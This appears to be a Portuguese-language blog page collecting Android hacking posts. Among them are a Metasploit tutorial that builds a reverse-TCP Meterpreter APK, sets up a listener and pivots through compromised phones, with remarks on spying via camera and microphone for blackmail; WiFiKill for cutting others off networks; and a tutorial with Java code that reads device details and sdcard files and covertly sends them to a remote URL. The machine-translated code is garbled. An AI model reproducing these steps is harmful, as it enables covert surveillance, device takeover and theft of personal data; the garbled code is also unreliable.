Aleatorios



--------------------------------------------------------------------------------------------------------------------------------------


Instalar e configurar Tor Browser no Android

Olá a todosGostaria de mostrar pra vcs essa dica de como Instalar e configurar o Tor Browser no Android.Nesse caso estou usando um Galaxy Nexus com acesso Root

Baixe o aplicativo oficial do Tor aqui
https://play.google.com/store/apps/details?id=org.torproject.android
Ao abrir a primeira vez podemos selecionar o idioma, selecione o português brasileiro, ou o de sua preferência.
Avançando será exibida uma tela com um botão para solicitar acesso root, selecione esse botão e dê acesso root.
Será exibido uma tela semelhante a essa:



Se marcarmos a opção Proxy All Apps Through Tor todos aplicativos farão acesso através do Tor.
Ou podemos selecionar o botão abaixo e clicando podemos definir qual App que queremos acessar a internet usando TOR. No meu caso aqui testei com sucesso selecionando apenas o Google Chrome
Avance e será exibida uma tela semelhante a essa:



A princípio o botão estará cinza, mas daí se pressionarmos o botão por alguns segundos ele vai conectar e ficar como acima, daí é só começar a navegar.
Para saber se deu certo você pode acessar o site www.omeuip.com e ver se o seu IP foi mudado realmente.
Nas configurações do programa é possível selecionar outros aplicativos para acessar via Tor.
Espero que tenham gostado da Dica.
Ajude a divulgar compartilhando
Até a próxima.
--------------------------------------------------------------------------------------------------------------------------------------

Meterpreter para Android



Há um tempo atrás, começou uma movimentação entre o pessoal que cuida de um fork do Metasploit, para desenvolver diversas funcionalidades que não existem na versão original mantida atualmente pela Rapid7. E dentre essas funcionalidades, está o Meterpreter Java portado para Android.

Já tem um bom tempo que estamos no aguardo de um Meterpreter para Linux, pois só havia uma versão para Windows, e algumas tentativas para o Linux, mas essa versão para Android, também é hiper bem vinda!

Para quem quiser dar uma olhada nessa nova funcionalidade, basta baixar essa versão do Metasploit, ou fazer a atualização de sua instalação com o comando ./msfupdate.

Logo abaixo, vocês podem ver o resultado desse comando atualizando o Metasploit com essa funcionalidade:

./msfupdate 
[*]
[*] Attempting to update the Metasploit Framework...
[*]

[...]
 create mode 100644 external/source/javapayload/androidpayload/library/src/androidpayload/stage/Meterpreter.java
 create mode 100644 external/source/javapayload/androidpayload/library/src/androidpayload/stage/Shell.java
 create mode 100644 external/source/javapayload/androidpayload/library/src/androidpayload/stage/Stage.java
 create mode 100644 external/source/javapayload/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
 create mode 100644 external/source/javapayload/androidpayload/library/src/com/metasploit/meterpreter/android/stdapi_fs_file_expand_path_android.java
 create mode 100644 external/source/javapayload/androidpayload/library/src/com/metasploit/meterpreter/android/stdapi_sys_process_get_processes_android.java


Além disso, podemos visualizar se o mesmo já está instalado:
./msfpayload -l | grep -i android
    android/meterpreter/reverse_tcp                  Connect back stager, Run a meterpreter server on Android
    android/shell/reverse_tcp                        Connect back stager, Spawn a piped command shell (sh)



E para testá-lo, podemos criar um payload que permite termos uma conexão reversa:

./msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.102 R > shell.apk


É interessante, que nesse caso específico, precisamos definir que o formato de saída do payload será RAW (por isso o parâmetro "R"), mas nesse caso em específico, apesar da saída ser RAW, o msfpayload cria um arquivo APK no formato específico do Android. Vejamos:

file shell.apk 
shell.apk: Zip archive data, at least v2.0 to extract

Depois de criado o arquivo, basta que instalemos o mesmo em um dispositivo Android, para vermos seu funcionamento. Mas antes de instalá-lo, vamos deixar nossa máquina escutando, à espera de uma conexão vinda do dispositivo Android:


./msfcli multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=0.0.0.0 E


Na imagem acima, podemos ver a conexão reversa sendo realizada e o resultado do comando sysinfo.

Com esse meterpreter, podemos tirar fotos a partir da câmera do dispositivo Android, tanto a dianteira quanto a traseira, se houver. Outras duas interessantes possibilidades, é acionar o microfone do dispositivo para gravação de áudio ambiente e de ligações, e também a utilização do terminal do dispositivo como se fosse um micro remoto. Obviamente que existem outras, e deixo vocês testarem por conta própria :-)


Ok, até aí, quando pensamos em usuários comuns, não vejo muitos problemas, a não ser, obviamente, a invasão de privacidade. Por exemplo, imagine você sendo chantageado, porque um cara descobriu que em sua última ida ao motel, não foi sua esposa que lhe acompanhou (ou vice-versa) ;-)

Mas pensemos em uma grande corporação, onde  o termo BYOD (Bring Your Own Device) está em voga e sendo implementado (sem os devidos controles de segurança)... O que será que pode ser descoberto gravando o áudio de um dispositivo utilizado por um executivo durante suas reuniões? E as fotos dos locais que ele frequenta?

Mas ainda assim isso é pouco...

Acredito que os(as) senhores(as), que já utilizaram o Metasploit (principalmente quem já fez algum curso de pentest comigo) conheçam o termo pivoting, que basicamente é a utilização de uma sessão do meterpreter, sendo utilizada como rota para tráfego de rede. Podemos fazer isso com o portfw também, como descrito nessa documentação da Offensive Security - http://www.offensive-security.com/metasploit-unleashed/Portfwd . Executando o comando abaixo, realizamos isso:

meterpreter> portfwd add -l 80 -r 192.168.100.10 -p 80
[*] Local TCP relay created: 0.0.0.0:80 <-> 192.168.100.10:80

Com esse procedimento, qualquer dispositivo Android que tenha acesso à rede interna de uma companhia, e que tenha sido comprometido por um atacante, torna-se uma porta de entrada para todos os recursos acessíveis para o funcionário dono do mesmo. E se esse funcionário, mais uma vez, for um executivo? E se esse executivo deixa seus filhos utilizarem seu smartphone ou tablet para instalar joguinhos sem conhecer a procedência ou confiabilidade dos mesmos?

Durmam com isso na mente!

Essa é uma preocupação que eu mesmo tenho, já que atuo com forense. Podem ver minha palestra sobre forense em Android aqui:
Vídeo - http://hackproofing.blogspot.com.br/2013/05/video-de-palestra-androids-forensic.html
Slides - http://hackproofing.blogspot.com.br/2012/05/slides-androids-forensics-you-shot.html
Creditos: Luiz Vieira....
--------------------------------------------------------------------------------------------------------------------------------------

Droid Pentest :: Tools

sniffing tools

Droid Pentest ajudá-lo a encontrar todos os apps Android para testes de penetração e hackers para que você possa fazer plataforma de teste completa penetração.

Link: http://sourceforge.net/projects/droidpentest/files/latest/download?source=directory
--------------------------------------------------------------------------------------------------------------------------------------

Ferramentas Hacker XSSF




O XSSF é uma ferramenta voltada para pentests (testes de invasão) com foco em vulnerabilidades do tipo XSS (Cross-Site Scripting), o seu propósito é tornar o processo de exploração desse tipo falha mais fácil e rápido.
Com o XSSF você consegue testar aplicações web, sites e até mesmo navegadores, em busca de vulnerabilidades XSS, se for encontrado alguma falha , você ainda pode tentar fazer a invasão utilizando exploits prontos ou criados por você.
Um ponto forte do XSSF é que ele é integrado ao Metasploit, dessa forma você pode utilizar módulos MSF (Metasploit Framework), além disso ele fornece uma poderosa API documentada, facilitando o desenvolvimento de novos módulos e ataques.
A instalação do XSSF é bemmm simples:
1- Como o XSSF se integra ao Metasploit, antes de tudo você precisa ter o próprio metasploit instalado em seu SO (Linux, MAC ou Windows), por isso baixe e instale o Metasploit. Com o Metasploit instalado, atualize o Ruby para a versão 1.9 (caso esteja com uma versão anterior).
2- Baixe o XSSF diretamente de sua página oficial no Google Code. Após o download, descompacte-o e copie todos os arquivos para a pasta do Metasploit (/msf3/), esta pasta esta localizada no diretório aonde todos os programas são instalados. Feito isso basta utilizar o XSSF.
Na página do XSSF você ainda encontra alguns vídeos aonde é mostrado o XSSF em ação, veja abaixo um deles:

http://www.youtube.com/watch?feature=player_embedded&v=hvHc0RTCAqE

No vídeo acima o atacante explorar uma vulnerabilidade XSS e consegue invadir um aparelho com o sistema operacional Android.
Para obter mais informações sobre o XSSF acesse o seu Google Code.
Links dessa matéria:
--------------------------------------------------------------------------------------------------------------------------------------

Confira os melhores emuladores de terminal para Android

bb_keywords = "bash"; bb_bid = "1632946"; bb_lang = "pt-BR"; bb_name = "custom";bb_limit = "7";bb_format = "bbc";
Confira os melhores emuladores de terminal para AndroidSe você sente falta de um terminal no seu Android mas não sabe ao certo qual instalar, nós preparamos uma lista de alguns dos melhores emuladores de terminal para os seus dispositivos Android.
Vamos a Lista!

Shell Commander
Criado usando Eclipse, GIMP e Inkscape, Shell Commander é um shell easy-to-use que vem com um explorador de arquivos embutido nela. Com suporte para edição de texto, Shell comandante torna fácil a visualização, inserção e modificação de comandos. Além disso, para aqueles que gostam de “jogar no deserto”, o aplicativo também suporta ‘sudo’, tornando-o ainda mais poderoso. Com pouco mais de 10K, o Shell comandante está disponível gratuitamente para download no Android Marketplace ou no link abaixo.
Confira os melhores emuladores de terminal para Android
BusyBox
Considerado como o instalador mais popular no mercado, este app, intitulado simplesmente como Busybox i, é um terminal BusyBox livre para Android. Pra quem não conheçe o BusyBox, ele é um conjunto de ferramentas Unix que vêm embalados em um único arquivo executável. Escrito por Bruce Perens, co-fundador da Open Source Initiative, BusyBox é frequentemente considerado como o “canivete suíço de Embedded Linux”. O aplicativo gratuito teve mais de 1 milhão de downloads, e foi sido classificado como 4,7 estrelas no Market. Embora gratis, o desenvolvedor depende exclusivamente de doações dos colegas hackers e entusiastas do software livre.
Android Terminal Emulator (ATE)

Android Terminal Emulator é um aplicativo gratuito que permite que você acesse o seu shell embutido no Android, enquanto imita o estilo de um terminal Digital Equipment Corporation VT-100. Acessíveis para telefones “rootados” ou não, o aplicativo pode ser usado para executar programas de serviço público no seu dispositivo Android.
Confira os melhores emuladores de terminal para Android
Better Terminal Emulator Pro

O Better Terminal Emulator Pro ou BETP, é um emulador de terminal avançado multi-sessão e cliente SSH para o seu telefone, tablet e TV Google. Disponíveis para dispositivos “rootados” ou não, o BETP permite que você execute um enorme conjunto de utilitários Linux a partir do seu dispositivo Android. A aplicação inclue BusyBox e apoio a BASH, ele também vem carregado com um SSH, Telnet e um cliente de FTP. Para aqueles que amam swiping através do teclado, o aplicativo também inclui suporte para Swype. Além disso, BETP é um dos poucos aplicativos que suportam uma gama tão ampla de dispositivos, incluindo tablets, TVs e smartphones. O aplicativo não é gratuito, mas é considerando de 4,6 à 5 estrelas no Market, e possui um número enorme de recursos que vem embalados na aplicação.
Confira os melhores emuladores de terminal para Android
Script Manager

Ele é uma aplicação Android gratuita que dobra-se como um editor de script, bem como um emulador multi-terminal. O aplicativo permite você gerenciar e executar scripts shell, e também permite que você programe tarefas cron, execute scripts de boot-up e muito mais. Outra coisa original sobre este emulador é que ele permite que você insira o código em seus scripts utilizando códigos QR. Uma vez que você terminar de inserir seus comandos, você também pode compartilhar sua saída com seus amigos e colegas. Esse incrível app já teve mais de 50 mil downloads até agora.
Confira os melhores emuladores de terminal para Android


Auentando a memoria ram do seu android


Kick usuários, dispositivos de WiFi

É o seu companheiro de quarto de comer toda a sua largura de banda Wifi baixar os torrents loucos? É a sua esposa streaming de filmes demais de Netflix? São os seus mais jovens de passar tanto tempo em nada, mas o Facebook? É quase o tempo começar a chutar-los de conexão Wifi.

Agora você pode chutar usuários e dispositivos de WiFi, usando um aplicativo chamado andróide WiFiKill. O aplicativo garante que um usuário alvo não é capaz de se conectar à Internet usando o Wi-fi.
WiFiKill é bastante simples: ele verifica sua rede para dispositivos conectados e dá a opção de matar individualmente sua conectividade de rede. Você também pode optar por retroceder todos os usuários, se você pretende. Marque a caixa "todos" e da rede serão completamente vazia em questão de segundos. Para voltar a habilitar a conectividade para qualquer dispositivo, basta desmarcar a caixa ao lado de seu nome.

Nota: App é coisa maluca para o seu wifi pela injeção de DNS spoofing e outras coisas UDP vários outros, só funciona em Enraizado telefones.
Há um monte de coisas que você pode fazer com ele, mas fazê-lo para as redes públicas ou compartilhada poderá criar sérios problemas. Esperamos que você não arrancar os usuários e criar confusão com este aplicativo. Use-o sabiamente, não ser um idiota. Se você prometer ser ético, sinta-se livre para instalar o aplicativo do mercado .

Checando os Ip Celular

iPhone

Com o aparelho conectado à internet, acesse o menu "Ajustes" e selecione a opção "Wi-Fi". Pressione a seta ao lado da conexão ativa para exibir todos os detalhes da rede.


Android

Pressione o botão "Menu" do aparelho e vá em "Configurações", pressione "Redes sem fio e outras" e depois "Configurações de Wi-Fi". Selecione a rede à qual você está conectado para exibir uma tela com todos os detalhes de sua conexão, incluindo o endereço IP.

Windows Mobile

Abra o Menu Iniar e selecione "Configurações", clicando em "Rede" logo depois. Todas as conexões disponíveis serão exibidas na tela, selecione a que estiver sendo utilizada e pressione "Editar". O endereço IP será exibido em um campo localizado no centro.

Como: Criar um aplicativo Android para roubar informações do usuário



Oi
Eu gostaria de compartilhar algumas coisas sobre o Android segurança, e vou tentar dar-lhe alguns exemplos, como na verdade você pode criar um aplicativo sem usar ou adicionar qualquer permissão incluindo android.permission.INTERNET, (normalmente é adicionado AndroidManifest.xml) , se você quiser que seu aplicativo para usar a conexão à Internet, com as funções abaixo, você será capaz de enviar dados para qualquer servidor sobre o http para o seu log apache no seu servidor, ou postar em suas páginas php. Primeiro vou mostrar-lhe que as informações estão disponíveis alguns que eu sei, talvez haja alguma informação mais desconhecido que está disponível. para ser enviar

1.List de detalhes sobre dispositivo do usuário, que podem ser tomadas, roubado e enviar para servidores remotos.
Normalmente, para obter algum usuário e telefone detalhada você precisa usar a permissão READ_PHONE_STATE mas se você utilizar a função abaixo
você realmente tem todas as informações sobre o usuário e telefone (número de telefone do usuário, ip, mac, país de telefone, empresa de telecomunicações, o endereço mac, ip, imei)

GetProp public void ()
{


try {
= String s "";


. Process p = Runtime.getRuntime () exec ("GetProp");
BufferedReader stdInput = new BufferedReader (new InputStreamReader (p.getInputStream ()));


while ((s = stdInput.readLine ()) = null)
{
Log.i ("Informações do Usuário:", "GetProp" + s);


}
}
catch (IOException e) {


}


}

2. Se você sabe como listar os aplicativos instalados, você pode usar o Gerenciador de Pacotes para Android e obter a lista de aplicativos instalados no telefone.

3.Você também pode escanear o sdcard e arquivos do celular e outros e verificar se há arquivos de texto.

Listando os arquivos disponíveis

públicas listfiles (void)
{


try {


File f = new File ("ls" + Environment.getExternalStorageDirectory ());
FileInputStream fileis = new FileInputStream (f);
Buf = new BufferedReader BufferedReader (new InputStreamReader (fileis));
Cordas ReadString = new String ();


while ((ReadString = buf.readLine ())! = null)
{
Log.i ("diretórios e arquivos:", ReadString);
}
}
catch (IOException e) {


}

leitura de um único arquivo no sdcard

3.a Leitura de um único arquivo

readsdcardfile public void ()
{


try {


File f = new File (Environment.getExternalStorageDirectory () + "filetoget.txt /");
FileInputStream fileIS = new FileInputStream (f);
Buf = new BufferedReader BufferedReader (new InputStreamReader (fileIS));
Cordas ReadString = new String ();


while ((ReadString = buf.readLine ())! = null)
{
Log.i ("file:", ReadString);
}
}
catch (IOException e) {


}




basicamente, você pode listar o primeiro por quaisquer arquivos de texto e, em seguida, ler todos os arquivos

E Finalmente, a parte mágica ok temos todas as informações, mas como é que vamos enviá-lo sem o conhecimento do usuário e colher alguns dados.

Este truque é muito simples de fazer, primeiro crie seus textos sobre as informações descritas acima que você deseja enviar que eu vou mostrar-lhe como enviá-los.
usando este código único de linha que você será capaz de se conectar a qualquer página http e enviar as suas cordas criadas anteriormente sobre telefone e detalhes do usuário ou arquivos de texto

MediaPlayer.create (isso,

Como é que isto irá enviar informações
Quando você chamar a função MediaPlayer.create estática, normalmente espera-se que você fornecer um link de vídeo de arquivo de áudio para streaming, bem, você não precisa, você pode simplesmente digitar qualquer url ainda vai conectar e mesmo que o link não está funcionando em do outro lado do servidor, você terá as informações que serão armazenadas em seus logs do servidor apache, porque você tem apenas solicitado um arquivo não existente no servidor com os detalhes do usuário e as outras coisas no url.

Você também pode criar uma página php e tentar postar seu material
php página de postagem, provavelmente deve funcionar como abaixo (eu testei este, mas supondo que ele só poderia trabalhar)

MediaPlayer.create (isso,

O truque principal deste tutorial é que sem o uso de qualquer permissão único em seu arquivo AndroidManifest.xml você será ainda capaz de enviar dados para qualquer servidor
usando apenas uma única linha de código que você acabou de pedir em seu site uma página não existente e que será registrado em seus serverlogs Apache ou se você tiver um arquivo de pós php você pode apenas imprimi-la em sua página ou armazenar em seu banco de dados.

MediaPlayer.create (este, Uri.parse ("http://www.kislaybhardwaj.com/mydetailstosendString));

Utilize este sabiamente e para fins de treinamento e apenas tomá-lo como um exemplo de como realmente android segurança é vulnerável.

Debian 6 && Metasploit 4 no Galaxy S I9000

No Android nem sempre tem todas as ferramentas para realizar um teste de penetração ideal para isso, eu decidi começar no debian 6 :) Io ho android 2.3.4 então eu tive que editar o script de inicialização de um momento para fazer um chroot :) Os requisitos são: busybox; acesso root; pelo menos 1 gb de espaço; emulador de terminal; O resultado é simplesmente fantástico
Primeiro temos que baixar um braço imagem
http://gititbit.ch/ddb1
http://gititbit.ch/ddb0
Eu sugiro que a imagem de 1 GB :) Agora vamos baixar o arquivo para iniciar o todo:
http://www.clshack.com/pt/nopaste/debian.zip
Depois de baixado descompacte o arquivo no cartão de memória debian.zip Android. Nós copiamos a imagem debian.img pacote debian para a pasta. Agora vamos começar um emulador de terminal ou shell adb e tipo:
cd /sdcard
cd debian
su
sh boot
Sh arquivo de inicialização contém duas variáveis ​​que podem ser modificados, vincos e img
Para sair:
exit Para instalar metasploit: Dependências
apt-get install ruby subversion libyaml-ruby libzlib-ruby libopenssl-ruby libreadline-ruby libiconv-ruby rubygems
]Nós o download da última atualização:
svn co https://www.metasploit.com/svn/framework3/trunk msf
Começar:
cd msf
ruby msfconsole
Atualizar:
svn update
Postagem mais recente Postagem mais antiga Página inicial

Populares

Recente

Software Avançado De Investigação Forense Móvel

O MOBILedit Forensics é um software forense avançado para telefones, que  extrai  e  analisa profundamente o conteúdo do telefone,  incluind...